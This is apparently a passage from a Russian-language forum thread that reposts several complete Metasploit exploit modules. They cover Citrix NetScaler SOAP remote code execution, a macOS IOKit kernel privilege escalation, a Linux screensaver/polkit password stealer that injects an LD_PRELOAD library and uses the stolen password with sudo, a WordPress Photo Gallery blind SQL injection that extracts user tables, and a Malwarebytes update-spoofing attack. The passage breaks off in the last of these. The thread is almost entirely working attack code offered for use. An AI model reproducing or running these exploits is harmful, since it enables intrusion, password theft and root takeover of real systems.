Модули для Metasploit Framework

DarckSol · 07.11.2014

Citrix NetScaler SOAP Handler Remote Code Execution Exploit

This Metasploit module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance. The vulnerability exists in the SOAP handler, accessible through the web interface. A malicious SOAP requests can force the handler to connect to a malicious NetScaler config server. This malicious config server can send a specially crafted response in order to trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary code with the privileges of the web server running the SOAP handler. This Metasploit module has been tested successfully on the NetScaler Virtual Appliance 450010.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Brute
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
      'Description'    => %q{
        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
        The vulnerability exists in the SOAP handler, accessible through the web interface. A
        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
        server. This malicious config server can send a specially crafted response in order to
        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
        code with the privileges of the web server running the SOAP handler. This module has been
        tested successfully on the NetScaler Virtual Appliance 450010.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bradley Austin', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'MinNops'        => 512,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Arch'           => ARCH_X86,
      'Platform'       => 'bsd',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'NetScaler Virtual Appliance 450010',
            {
              'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
              'Offset'       => 606,
              'Ret'          => 0xffffda94, # Try before bruteforce...
              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
              # process being exploited is an apache child, the bruteforce attack works fine
              # here.
              'Bruteforce'   =>
                {
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
                  'Stop'  => { 'Ret' => 0xfffdf000 }, # top of the stack
                  'Step'  => 256
                }
            }
          ],
        ],
      'DisclosureDate' => "Sep 22 2014",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
        OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
        OptPort.new('SRVPORT', [true,  "The local port to listen on.", 3010])
      ], self.class)
  end
 
 
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    })
 
    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
      return Exploit::CheckCode::Detected
    end
 
    Exploit::CheckCode::Unknown
  end
 
  def exploit
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
    end
 
    if check != Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
    end
 
    start_service
 
    if target.ret
      @curr_ret = target.ret
      send_request_soap
      Rex.sleep(3)
 
      if session_created?
        return
      end
    end
 
    super
  end
 
  def brute_exploit(addrs)
    @curr_ret = addrs['Ret']
    send_request_soap
  end
 
  def send_request_soap
    soap = <<-EOS
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns7744:login xmlns:ns7744="urn:NSConfig">
<username xsi:type="xsd:string">nsroot</username>
<password xsi:type="xsd:string">nsroot</password>
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
</ns7744:login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
    EOS
 
    print_status("#{peer} - Sending soap request...")
 
    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'data'   => soap
    }, 1)
  end
 
  def on_client_data(c)
    print_status("#{c.peerhost} - Getting request...")
 
    data = c.get_once(2)
    req_length = data.unpack("v")[0]
 
    req_data = c.get_once(req_length - 2)
    unless req_data.unpack("V")[0] == 0xa5a50000
      print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
    end
 
    print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
 
    my_payload = Rex::Text.pattern_create(target['Offset'])
    my_payload << [@curr_ret, target['RwPtr']].pack("V*")
    my_payload << payload.encoded
 
    pkt = [my_payload.length + 6].pack("v")
    pkt << "\x00\x00\xa5\xa5"
    pkt << my_payload
    c.put(pkt)
    c.disconnect
  end
 
end

DarckSol · 03.12.2014

Mac OS X IOKit Keyboard Driver Root Privilege Escalation Exploit

A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue has been patched silently in Yosemite.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking # Can cause kernel crash
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
      'Description'   => %q{
        A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
        corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
        pointers can also be leaked, allowing a full kASLR bypass.
 
        Tested on Mavericks 10.9.5, and should work on previous versions.
 
        The issue has been patched silently in Yosemite.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
          'joev' # copy/paste monkey
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4404' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
          # Heap overflow:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
          # kALSR defeat:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => ARCH_X86_64,
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))
  end
 
  def check
    if ver_lt(osx_ver, "10.10")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
    binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
    binary_payload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
 
    print_status("Writing exploit file as '#{exploit_file}'")
    write_file(exploit_file, binary_exploit)
    register_file_for_cleanup(exploit_file)
 
    print_status("Writing payload file as '#{payload_file}'")
    write_file(payload_file, binary_payload)
    register_file_for_cleanup(payload_file)
 
    print_status("Executing payload...")
    cmd_exec("chmod +x #{exploit_file}")
    cmd_exec("chmod +x #{payload_file}")
    cmd_exec("#{exploit_file} #{payload_file}")
  end
 
  def osx_ver
    cmd_exec("sw_vers -productVersion").to_s.strip
  end
 
  def ver_lt(a, b)
    Gem::Version.new(a) < Gem::Version.new(b)
  end
 
end
 
# 026E5C06A55EEDD9   1337day.com [2014-12-03]   AB172C86C9DFF81B #

DarckSol · 31.12.2014

Desktop Linux Password Stealer / Privilege Escalation Exploit

This Metasploit module steals the user password of an administrative user on a desktop Linux system when it is entered for unlocking the screen or for doing administrative actions using policykit. Then it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the password from the keyboard to the actual password verification against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under the current user account to query for the password and then pass it to a setuid-root binary to do the password verification. Therefore it is possible to inject a password stealer after compromising the user account. Since sudo requires only the user password (and not the root password of the system), stealing the user password of an administrative user directly allows escalating to root privileges. Please note that you have to start a handler as a background job before running this exploit since the exploit will only create a shell when the user actually enters the password (which may be hours after launching the exploit). Using exploit/multi/handler with the option ExitOnSession set to false should do the job.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'base64'
require 'metasm'
 
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Post::File
 
  def initialize(info={})
    super( update_info( info, {
      'Name'          => 'Desktop Linux Password Stealer and Privilege Escalation',
      'Description'   => %q{
        This module steals the user password of an administrative user on a desktop Linux system
        when it is entered for unlocking the screen or for doing administrative actions using
        policykit. Then it escalates to root privileges using sudo and the stolen user password.
        It exploits the design weakness that there is no trusted channell for transferring the
        password from the keyboard to the actual password verificatition against the shadow file
        (which is running as root since /etc/shadow is only readable to the root user). Both
        screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
        the current user account to query for the password and then pass it to a setuid-root binary
        to do the password verification. Therefore it is possible to inject a password stealer
        after compromising the user account. Since sudo requires only the user password (and not
        the root password of the system), stealing the user password of an administrative user
        directly allows escalating to root privileges. Please note that you have to start a handler
        as a background job before running this exploit since the exploit will only create a shell
        when the user actually enters the password (which may be hours after launching the exploit).
        Using exploit/multi/handler with the option ExitOnSession set to false should do the job.
      },
      'License'       => MSF_LICENSE,
      'Author'        => ['Jakob Lell'],
      'DisclosureDate' => 'Aug 7 2014',
      'Platform'      => 'linux',
      'Arch'          => [ARCH_X86, ARCH_X86_64],
      'SessionTypes'  => ['shell', 'meterpreter'],
      'Targets'       =>
        [
          ['Linux x86', {'Arch' => ARCH_X86}],
          ['Linux x86_64', {'Arch' => ARCH_X86_64}]
        ],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependFork' => true,
          'DisablePayloadHandler' => true
        },
      'DefaultTarget' => 0,
      }
    ))
 
    register_options([
      OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp']),
    ], self.class)
  end
 
  def check
    check_command = 'if which perl && '
    check_command << 'which sudo && '
    check_command << 'id|grep -E \'sudo|adm\' && '
    check_command << 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1;'
    check_command << 'then echo OK;'
    check_command << 'fi'
 
    output = cmd_exec(check_command).gsub("\r", '')
 
    vprint_status(output)
 
    if output['OK'] == 'OK'
      return Exploit::CheckCode::Vulnerable
    end
 
    Exploit::CheckCode::Safe
  end
 
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    pl = generate_payload_exe
    if pl.blank?
      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
    end
 
    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
 
    print_status("Writing payload executable to '#{exe_file}'")
    write_file(exe_file, pl)
    cmd_exec("chmod +x #{exe_file}")
 
 
    cpu = nil
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
    elsif target['Arch'] == ARCH_X86_64
      cpu = Metasm::X86_64.new
    end
    lib_data = Metasm::ELF.compile_c(cpu, c_code(exe_file)).encode_string(:lib)
    lib_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.so"
 
    print_status("Writing lib file to '#{lib_file}'")
    write_file(lib_file,lib_data)
 
    print_status('Restarting processes (screensaver/policykit)')
    restart_commands = get_restart_commands
    restart_commands.each do |cmd|
      cmd['LD_PRELOAD_PLACEHOLDER'] = lib_file
      cmd_exec(cmd)
    end
    print_status('The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep a handler running.')
  end
 
  def get_restart_commands
    get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
    get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
    get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
    get_cmd_lines << '$/=undef;'
    get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
 
    text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
    vprint_status(text_output)
 
    lines = text_output.split("\n")
 
    restart_commands = []
    i=0
    while i < lines.length - 3
      m = lines[i].match(/^PID:(\d+)/)
 
      if m
        pid = m[1]
        vprint_status("PID=#{pid}")
        print_status("Found process: " + lines[i+1])
 
        exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
        vprint_status("exe=#{exe}")
 
        cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack('H*').split("\x00")
        vprint_status("CMDLINE=" + cmdline.join(' XXX '))
 
        env = lines[i+3].match(/^environ:(\w+)$/)[1]
        restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();'
        restart_command << 'kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}'
        restart_command << '$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\''
 
        vprint_status("RESTART: #{restart_command}")
        restart_commands.push(restart_command)
      end
 
      i+=1
    end
 
    restart_commands
  end
 
  def c_code(exe_file)
    c = %Q|
// A few constants/function definitions/structs copied from header files
#define RTLD_NEXT      ((void *) -1l)
extern uintptr_t dlsym(uintptr_t, char*);
// Define some structs to void so that we can ignore all dependencies from these structs
#define FILE void
#define pam_handle_t void
extern FILE *popen(const char *command, const char *type);
extern int pclose(FILE *stream);
extern int fprintf(FILE *stream, const char *format, ...);
extern char *strstr(const char *haystack, const char *needle);
extern void *malloc(unsigned int size);
 
struct pam_message {
  int msg_style;
  const char *msg;
 };
 
struct pam_response {
  char *resp;
  int resp_retcode;
};
 
struct pam_conv {
  int (*conv)(int num_msg, const struct pam_message **msg,
  struct pam_response **resp, void *appdata_ptr);
  void *appdata_ptr;
};
 
void run_sudo(char* password) {
  FILE* sudo = popen("sudo -S #{exe_file}", "w");
  fprintf(sudo,"%s\\n",password);
  pclose(sudo);
}
 
int my_conv(int num_msg, const struct pam_message **msg, struct pam_response **resp, void *appdata_ptr) {
  struct pam_conv *orig_pam_conversation = (struct pam_conv *)appdata_ptr;
  int i;
  int passwd_index = -1;
  for(i=0;i<num_msg;i++){
    if(strstr(msg[i]->msg,"Password") >= 0){
      passwd_index = i;
    }
  }
  int result = orig_pam_conversation->conv(num_msg, msg, resp, orig_pam_conversation->appdata_ptr);
  if(passwd_index >= 0){
    run_sudo(resp[passwd_index]->resp);
  }
  return result;
}
 
int pam_start(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh) __attribute__((export)) {
  static int (*orig_pam_start)(const char *service_name, const char *user, const struct pam_conv *pam_conversation, pam_handle_t **pamh);
  if(!orig_pam_start){
    orig_pam_start = dlsym(RTLD_NEXT,"pam_start");
  }
  struct pam_conv *my_pam_conversation = malloc(sizeof(struct pam_conv));
  my_pam_conversation->conv = &my_conv;
  my_pam_conversation->appdata_ptr = (struct pam_conv *)pam_conversation;
  return orig_pam_start(service_name, user, my_pam_conversation, pamh);
}
 
void polkit_agent_session_response (void *session, char *response) __attribute__((export)) {
  static void *(*orig_polkit_agent_session_response)(void *session, char* response);
  if(!orig_polkit_agent_session_response){
    orig_polkit_agent_session_response = dlsym(RTLD_NEXT,"polkit_agent_session_response");
  }
  run_sudo(response);
  orig_polkit_agent_session_response(session, response);
  return;
}
|
    c
  end
end

DarckSol · 14.01.2015

Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration Exploit

This Metasploit module exploits an unauthenticated SQL injection in order to enumerate the Wordpress users tables, including password hashes. This Metasploit module was tested against version 1.2.7.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class Metasploit4 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration",
      'Description'    => %q{
      This module exploits an unauthenticated SQL injection in order to enumerate the Wordpress
      users tables, including password hashes. This module was tested against version 1.2.7.
      },
      'License'        => 'ExploitHub',
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))
 
      register_options(
      [
        OptInt.new('GALLERYID', [false, 'Gallery ID to use. If not provided, the module will attempt to bruteforce one.', nil]),
        OptString.new('TARGETURI', [ true, 'Relative URI of Wordpress installation', '/'])
      ], self.class)
  end
 
  def get_params
    {
      'tag_id' => 0,
      'action' => 'GalleryBox',
      'current_view' => 0,
      'image_id' => 1,
      'gallery_id' => 1,
      'theme_id' => 1,
      'thumb_width' => 180,
      'thumb_height' => 90,
      'open_with_fullscreen' => 0,
      'open_with_autoplay' => 0,
      'image_width' => 800,
      'image_height' => 500,
      'image_effect' => 'fade',
      'sort_by' => 'order',
      'order_by' => 'asc',
      'enable_image_filmstrip' => 1,
      'image_filmstrip_height' => 70,
      'enable_image_ctrl_btn' => 1,
      'enable_image_fullscreen' => 1,
      'popup_enable_info' => 1,
      'popup_info_always_show' => 0,
      'popup_info_full_width' => 0,
      'popup_hit_counter' => 0,
      'popup_enable_rate' => 0,
      'slideshow_interval' => 5,
      'enable_comment_social' => 1,
      'enable_image_facebook' => 1,
      'enable_image_twitter' => 1,
      'enable_image_google' => 1,
      'enable_image_pinterest' => 0,
      'enable_image_tumblr' => 0,
      'watermark_type' => 'none',
      'current_url' => ''
    }
  end
 
  def bruteforce_gallery_id
    1.upto(666) do |i|
      get_vars = get_params
      get_vars['gallery_id'] = i
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
        'vars_get' => get_vars
      })
 
      return i if res and res.body =~ /data\["0"\] = \[\];/
    end
 
    fail_with(Failure::Unknown, "Couldn't bruteforce a gallery ID, please explicitly supply a known good gallery ID")
  end
 
  def run
    gallery_id = datastore['GALLERYID']
 
    if gallery_id == 0
      print_status('No GALLERYID supplied, attempting bruteforce.')
      gallery_id = bruteforce_gallery_id
      print_status("Found a gallery with an ID of #{gallery_id}")
    end
 
    parms = get_params
    parms['gallery_id'] = gallery_id
 
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })
 
    real_length = res.body.length
 
    count = nil
    1.upto(999) do |i|
      payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(DISTINCT(schema_name)),0x20) FROM INFORMATION_SCHEMA.SCHEMATA) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 3181*(SELECT 3181 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
      res = send_injected_request(payload, gallery_id)
 
      count = i if res.body.length == real_length
      break if count
    end
 
    print_status("Looks like there are #{count} databases.")
 
    schemas = []
    0.upto(count-1) do |i|
      length = nil
 
      1.upto(999) do |c|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(schema_name),0x20) FROM (SELECT DISTINCT(schema_name) "
        payload << "FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS pxqq) BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 6586*"
        payload << "(SELECT 6586 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
        res = send_injected_request(payload, gallery_id)
 
        length = c if res.body.length == real_length
        break if !length.nil?
      end
 
      print_status("Schema #{i}'s name has a length of #{length}. Getting name.")
 
      name = ''
      1.upto(length) do |l|
        126.downto(32) do |c|
          payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(schema_name AS CHAR),0x20) FROM (SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS lela),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7601*(SELECT 7601 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
          res = send_injected_request(payload, gallery_id)
 
          vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
          name << (c+1).chr if res.body.length == real_length
          break if res.body.length == real_length
        end
      end
      schemas << name
      print_status("Found database #{name}")
    end
 
    schemas.delete('mysql')
    schemas.delete('performance_schema')
    schemas.delete('information_schema')
 
    schemas.each do |schema|
      num_tables = nil
      1.upto(999) do |i|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]}) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 8846*(SELECT 8846 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
        res = send_injected_request(payload, gallery_id)
 
        num_tables = i if res.body.length == real_length
        break if num_tables
      end
 
      print_status("Schema #{schema} has #{num_tables} tables. Enumerating.")
 
      tables = []
      0.upto(num_tables - 1) do |t|
        length = nil
        0.upto(64) do |l|
          payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1) BETWEEN 0 AND #{l}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
          res = send_injected_request(payload, gallery_id)
 
          length = l if res.body.length == real_length
          break if length
        end
 
        print_status("Table #{t}'s name has a length of #{length}")
 
        name = ''
        1.upto(length) do |l|
          126.downto(32) do |c|
            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
            res = send_injected_request(payload, gallery_id)
 
            name << (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
            break if res.body.length == real_length
          end
        end
        print_status("Found table #{name}")
        tables << name if name =~ /users$/
      end
 
      print_status("Found #{tables.length} possible user tables. Enumerating users.")
 
      tables.each do |table|
        table_count = ''
        char = 'a'
 
        i = 1
        while char
          char = nil
          58.downto(48) do |c|
            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{schema}.#{table}),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 8335*(SELECT 8335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
            res = send_injected_request(payload, gallery_id)
 
            char = (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{char}") if char
            table_count << char if char
            break if char
          end
          i = i + 1
        end
 
        table_count = table_count.to_i
 
        print_status("Table #{table} has #{table_count} rows.")
        user_cols = ["ID", "user_url", "user_pass", "user_login", "user_email", "user_status", "display_name", "user_nicename", "user_registered", "user_activation_key"]
 
        0.upto(table_count-1) do |t|
          user_cols.each do |col|
            i = 1
            length = '0'
            char = 'a'
 
            while char
              char = nil
              58.downto(48) do |c|
                payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(#{col}) AS CHAR),0x20) FROM #{schema}.#{table} ORDER BY ID LIMIT #{t},1),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7837*(SELECT 7837 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
 
                res = send_injected_request(payload, gallery_id)
 
                char = (c+1).chr if res.body.length == real_length
                vprint_status("Found char #{char}") if char
                length << char if char
                break if char
              end
              i = i + 1
            end
 
            length = length.to_i
            print_status("Column #{col} of row #{t} has a length of #{length}")
          end
        end
      end
    end
  end
 
  def send_injected_request(payload, gallery_id)
    parms = get_params
    parms['gallery_id'] = gallery_id
    parms['order_by'] = 'asc ' + payload
 
    return send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })
  end
 
end

DarckSol · 05.02.2015

Malwarebytes Anti-Malware / Anti-Exploit Update Remote Code Execution Exploit

This Metasploit module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This Metasploit module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer
 
  VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
  EXE_REGEX     = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
  NEXT_VERSION  = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the update functionality of
        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
        Anti-Exploit consumer 1.03.1.1220.
        Due to the lack of proper update package validation a man-in-the-middle
        attacker could execute arbitrary code by spoofing the update server
        data-cdn.mbamupdates.com and uploading an executable. This module has
        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Yonathan Klijnsma',  # Vulnerability discovery and PoC
          'Gabor Seljan',       # Metasploit module
          'todb'                # Module refactoring
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4936' ],
          [' OSVDB', '116050'],
          [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 16 2014',
      'DefaultTarget'  => 0
    ))
 
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
      ], self.class)
 
    # Vulnerable Malwarebytes clients do not allow altering these.
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end
 
  def on_request_uri(cli, request)
    case request.uri
    when VERSION_REGEX
      serve_update_notice(cli) if set_exploit_target($1, request)
    when EXE_REGEX
      serve_exploit(cli)
    else
      vprint_status "Sending empty page for #{request.uri}"
      serve_default_response(cli)
    end
  end
 
  def serve_default_response(cli)
    send_response(cli, '')
  end
 
  def check_client_version(request)
    return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/
    this_version = $1
    next_version = NEXT_VERSION[:mbam]
    if
      Gem::Version.new(next_version) >= Gem::Version.new(this_version)
      return true
    else
      print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
      return false
    end
  end
 
  def set_exploit_target(package, request)
    case package
    when /mbam/i
      if check_client_version(request)
        @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
      else
        serve_default_response(cli)
        return false
      end
    when /mbae/i
      # We don't get identifying info from MBAE
      @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
    end
  end
 
  def serve_update_notice(cli)
    software,next_version = @client_software
    print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
    send_response(cli, next_version,
                  'Content-Type' => 'application/octet-stream'
                 )
  end
 
  def serve_exploit(cli)
